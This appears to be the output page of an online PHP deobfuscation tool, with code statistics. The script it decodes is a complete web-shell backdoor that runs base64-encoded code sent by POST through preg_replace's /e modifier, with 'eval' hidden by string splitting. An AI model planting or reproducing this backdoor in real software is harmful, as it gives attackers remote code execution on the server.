Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $..
Decoded Output download
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a'); ?>
Did this file decode correctly?
Original Code
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
Function Calls
trim | 1 |
preg_replace | 1 |
session_start | 1 |
Stats
MD5 | 5c8fbf286be0d874c400b3dbce26400c |
Eval Count | 1 |
Decode Time | 85 ms |